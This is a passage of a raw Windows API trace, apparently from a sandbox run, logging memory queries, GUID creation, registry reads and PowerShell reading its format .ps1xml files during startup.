	[0298.952] VirtualQuery (in: lpAddress=0x28bd20, lpBuffer=0x28cbe0, dwLength=0x30 | out: lpBuffer=0x28cbe0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.953] VirtualQuery (in: lpAddress=0x28bb40, lpBuffer=0x28ca00, dwLength=0x30 | out: lpBuffer=0x28ca00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.953] VirtualQuery (in: lpAddress=0x28b390, lpBuffer=0x28c250, dwLength=0x30 | out: lpBuffer=0x28c250*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.953] VirtualQuery (in: lpAddress=0x28b390, lpBuffer=0x28c250, dwLength=0x30 | out: lpBuffer=0x28c250*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.953] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xd60e6eed, Data2=0xe36d, Data3=0x460e, Data4=([0]=0x80, [1]=0x34, [2]=0x3f, [3]=0x12, [4]=0x3f, [5]=0x75, [6]=0x13, [7]=0x32))) returned 0x0
	[0298.953] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xa83650, Data2=0x5580, Data3=0x4c2c, Data4=([0]=0xa6, [1]=0x8a, [2]=0xf, [3]=0xfe, [4]=0x71, [5]=0x27, [6]=0xa0, [7]=0x19))) returned 0x0
	[0298.953] SetErrorMode (uMode=0x1) returned 0x1
	[0298.954] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0298.954] GetFileType (hFile=0x328) returned 0x1
	[0298.954] SetErrorMode (uMode=0x1) returned 0x1
	[0298.954] GetFileType (hFile=0x328) returned 0x1
	[0298.954] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.955] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.955] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.956] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.956] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.956] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.957] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.957] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.957] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.958] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.958] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.958] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.958] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.959] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.959] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.959] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.960] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.960] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0xbce, lpOverlapped=0x0) returned 1
	[0298.960] ReadFile (in: hFile=0x328, lpBuffer=0x34058ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34058ae*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.961] ReadFile (in: hFile=0x328, lpBuffer=0x3406178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3406178*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.961] CloseHandle (hObject=0x328) returned 1
	[0298.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.961] SetErrorMode (uMode=0x1) returned 0x1
	[0298.961] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0298.961] SetErrorMode (uMode=0x1) returned 0x1
	[0298.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.962] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x328) returned 0x0
	[0298.962] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0298.962] CoTaskMemAlloc (cb=0x5a) returned 0x50cc90
	[0298.962] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x50cc90, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0298.962] CoTaskMemFree (pv=0x50cc90) 
	[0298.962] RegCloseKey (hKey=0x328) returned 0x0
	[0298.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.973] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3409c042, Data2=0xffe7, Data3=0x4aaf, Data4=([0]=0x9f, [1]=0xa2, [2]=0x90, [3]=0x12, [4]=0xf2, [5]=0x2e, [6]=0x73, [7]=0xc2))) returned 0x0
	[0298.974] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf3bda49, Data2=0x8afc, Data3=0x4f53, Data4=([0]=0x8f, [1]=0xa2, [2]=0x9a, [3]=0x1d, [4]=0x19, [5]=0x7a, [6]=0xaf, [7]=0xa8))) returned 0x0
	[0298.974] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xad3ad44f, Data2=0xdef8, Data3=0x4f15, Data4=([0]=0x86, [1]=0xc2, [2]=0x89, [3]=0x74, [4]=0x8, [5]=0x80, [6]=0xd2, [7]=0x2d))) returned 0x0
	[0298.975] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x34e2300d, Data2=0xdb4e, Data3=0x418e, Data4=([0]=0xbe, [1]=0x50, [2]=0x71, [3]=0x6, [4]=0x85, [5]=0xb3, [6]=0x60, [7]=0xe5))) returned 0x0
	[0298.975] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x89e0cc29, Data2=0x507e, Data3=0x4ebb, Data4=([0]=0x96, [1]=0xc6, [2]=0x71, [3]=0xd3, [4]=0xe, [5]=0xce, [6]=0x51, [7]=0x45))) returned 0x0
	[0298.976] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x875b3b17, Data2=0x6cb2, Data3=0x4856, Data4=([0]=0xbe, [1]=0x22, [2]=0x95, [3]=0x70, [4]=0x7a, [5]=0xfa, [6]=0x20, [7]=0x88))) returned 0x0
	[0298.976] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.977] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe56cbd87, Data2=0x210d, Data3=0x4261, Data4=([0]=0xac, [1]=0x49, [2]=0x3c, [3]=0x28, [4]=0xe6, [5]=0xfa, [6]=0x9c, [7]=0x7))) returned 0x0
	[0298.977] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.979] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.979] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6cff4681, Data2=0x745a, Data3=0x4097, Data4=([0]=0xbf, [1]=0x18, [2]=0xd7, [3]=0x4d, [4]=0xcf, [5]=0x1f, [6]=0x1e, [7]=0x2c))) returned 0x0
	[0298.980] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x37c83a22, Data2=0xe5a9, Data3=0x495b, Data4=([0]=0xb6, [1]=0xe9, [2]=0x9d, [3]=0x95, [4]=0x2e, [5]=0x24, [6]=0x99, [7]=0xb6))) returned 0x0
	[0298.980] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf5a06284, Data2=0xf73e, Data3=0x4e49, Data4=([0]=0x89, [1]=0x45, [2]=0x70, [3]=0xae, [4]=0x48, [5]=0xe, [6]=0xfa, [7]=0x1e))) returned 0x0
	[0298.980] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x8d5e7769, Data2=0x94ac, Data3=0x4bf0, Data4=([0]=0x9c, [1]=0xa4, [2]=0x24, [3]=0xc, [4]=0x82, [5]=0xc8, [6]=0x1c, [7]=0xad))) returned 0x0
	[0298.980] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.980] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9715b788, Data2=0xea91, Data3=0x42f0, Data4=([0]=0x93, [1]=0xef, [2]=0x42, [3]=0xb, [4]=0x34, [5]=0x6, [6]=0xc5, [7]=0x70))) returned 0x0
	[0298.980] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.980] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.980] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.980] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.981] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x946a0600, Data2=0xe015, Data3=0x4a1c, Data4=([0]=0x88, [1]=0x8a, [2]=0xa4, [3]=0xe3, [4]=0xf0, [5]=0x86, [6]=0x44, [7]=0xdf))) returned 0x0
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xa0910e6c, Data2=0x8e9d, Data3=0x4e2d, Data4=([0]=0xaa, [1]=0x66, [2]=0xa4, [3]=0x97, [4]=0x4d, [5]=0xb8, [6]=0x73, [7]=0x19))) returned 0x0
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x63a04edf, Data2=0x6ef0, Data3=0x4631, Data4=([0]=0x92, [1]=0x83, [2]=0xa6, [3]=0x77, [4]=0x8a, [5]=0x20, [6]=0x35, [7]=0x3c))) returned 0x0
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x709d1903, Data2=0x8864, Data3=0x4afa, Data4=([0]=0xa7, [1]=0x6e, [2]=0xc9, [3]=0xde, [4]=0x2b, [5]=0x15, [6]=0x59, [7]=0x19))) returned 0x0
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3d0a04e, Data2=0x7e1f, Data3=0x4d55, Data4=([0]=0xba, [1]=0x3e, [2]=0x32, [3]=0xa2, [4]=0xf2, [5]=0x93, [6]=0x3f, [7]=0x7))) returned 0x0
	[0298.981] VirtualQuery (in: lpAddress=0x28bd20, lpBuffer=0x28cbe0, dwLength=0x30 | out: lpBuffer=0x28cbe0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc9ed7ac0, Data2=0xcbac, Data3=0x4fc9, Data4=([0]=0xbf, [1]=0xc1, [2]=0xcc, [3]=0x11, [4]=0xb1, [5]=0xdd, [6]=0x16, [7]=0xf9))) returned 0x0
	[0298.981] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9ebbd937, Data2=0x7cdc, Data3=0x4782, Data4=([0]=0xa6, [1]=0xf8, [2]=0x3a, [3]=0x3b, [4]=0xf8, [5]=0xe2, [6]=0x8c, [7]=0xa0))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3e4cd904, Data2=0x3b18, Data3=0x4331, Data4=([0]=0x88, [1]=0xcb, [2]=0x4a, [3]=0x6d, [4]=0x98, [5]=0x32, [6]=0xbd, [7]=0x2d))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x8b311934, Data2=0xb62d, Data3=0x4436, Data4=([0]=0xb3, [1]=0x40, [2]=0xd2, [3]=0xfe, [4]=0x0, [5]=0x70, [6]=0x40, [7]=0x1b))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x226b4da7, Data2=0x1cb, Data3=0x4b97, Data4=([0]=0x9e, [1]=0x77, [2]=0x12, [3]=0x46, [4]=0xbd, [5]=0x55, [6]=0xa7, [7]=0x7a))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xbb91ef83, Data2=0x27b8, Data3=0x4ccc, Data4=([0]=0x9c, [1]=0x4d, [2]=0xc5, [3]=0x91, [4]=0xa, [5]=0x11, [6]=0x5c, [7]=0x61))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x1dc9d446, Data2=0xe77d, Data3=0x4308, Data4=([0]=0x8b, [1]=0xfe, [2]=0xcd, [3]=0xea, [4]=0xc1, [5]=0xe6, [6]=0x87, [7]=0x7b))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x62b1f6e9, Data2=0xdc95, Data3=0x420b, Data4=([0]=0x86, [1]=0xb7, [2]=0x3d, [3]=0x27, [4]=0x22, [5]=0x3b, [6]=0xf3, [7]=0xaf))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc10b295a, Data2=0x1366, Data3=0x4bc7, Data4=([0]=0xbb, [1]=0x98, [2]=0xcf, [3]=0x52, [4]=0x5c, [5]=0xa5, [6]=0x7d, [7]=0xda))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5803619f, Data2=0x9fe5, Data3=0x422d, Data4=([0]=0xbf, [1]=0x50, [2]=0xa3, [3]=0x12, [4]=0xcb, [5]=0x1, [6]=0x51, [7]=0xeb))) returned 0x0
	[0298.982] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x55c425c5, Data2=0x7824, Data3=0x4e22, Data4=([0]=0xbb, [1]=0xac, [2]=0x7, [3]=0x3f, [4]=0x4c, [5]=0x47, [6]=0xa6, [7]=0x44))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x742f4e8d, Data2=0x50e, Data3=0x41ea, Data4=([0]=0x92, [1]=0xdc, [2]=0xd2, [3]=0xe3, [4]=0xb6, [5]=0x66, [6]=0x2d, [7]=0x5e))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xbf1f1a17, Data2=0x40cb, Data3=0x4db1, Data4=([0]=0x93, [1]=0x32, [2]=0xf6, [3]=0xdc, [4]=0x8d, [5]=0xcc, [6]=0xff, [7]=0x22))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc30a801f, Data2=0xfbc7, Data3=0x4caa, Data4=([0]=0x9a, [1]=0x96, [2]=0x2b, [3]=0xfa, [4]=0xe5, [5]=0xdf, [6]=0xdc, [7]=0xae))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xba9b4257, Data2=0x4285, Data3=0x4d2c, Data4=([0]=0xb0, [1]=0x81, [2]=0x9c, [3]=0xd6, [4]=0xfb, [5]=0x9b, [6]=0x26, [7]=0xf1))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5923cb11, Data2=0xa1c6, Data3=0x45cf, Data4=([0]=0xb7, [1]=0x38, [2]=0x4, [3]=0xd5, [4]=0xd, [5]=0xa6, [6]=0x77, [7]=0xe7))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xed811153, Data2=0xfdc4, Data3=0x40c1, Data4=([0]=0x81, [1]=0x56, [2]=0xd3, [3]=0x24, [4]=0xc2, [5]=0xac, [6]=0x12, [7]=0x51))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x8aee97cf, Data2=0x938a, Data3=0x4d8e, Data4=([0]=0x8e, [1]=0xb, [2]=0x65, [3]=0xe3, [4]=0x70, [5]=0x8f, [6]=0xbe, [7]=0x7a))) returned 0x0
	[0298.983] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x15bfdb7c, Data2=0xbcd4, Data3=0x4f5a, Data4=([0]=0xbd, [1]=0x34, [2]=0x3a, [3]=0xc4, [4]=0x37, [5]=0xdb, [6]=0x75, [7]=0xfe))) returned 0x0
	[0298.983] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.984] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.984] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.984] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x2a725ff8, Data2=0x85ce, Data3=0x4c71, Data4=([0]=0x99, [1]=0x28, [2]=0x50, [3]=0x54, [4]=0x6c, [5]=0xa7, [6]=0x3e, [7]=0x6))) returned 0x0
	[0298.984] SetErrorMode (uMode=0x1) returned 0x1
	[0298.984] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0298.985] GetFileType (hFile=0x32c) returned 0x1
	[0298.985] SetErrorMode (uMode=0x1) returned 0x1
	[0298.985] GetFileType (hFile=0x32c) returned 0x1
	[0298.985] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.985] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.985] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
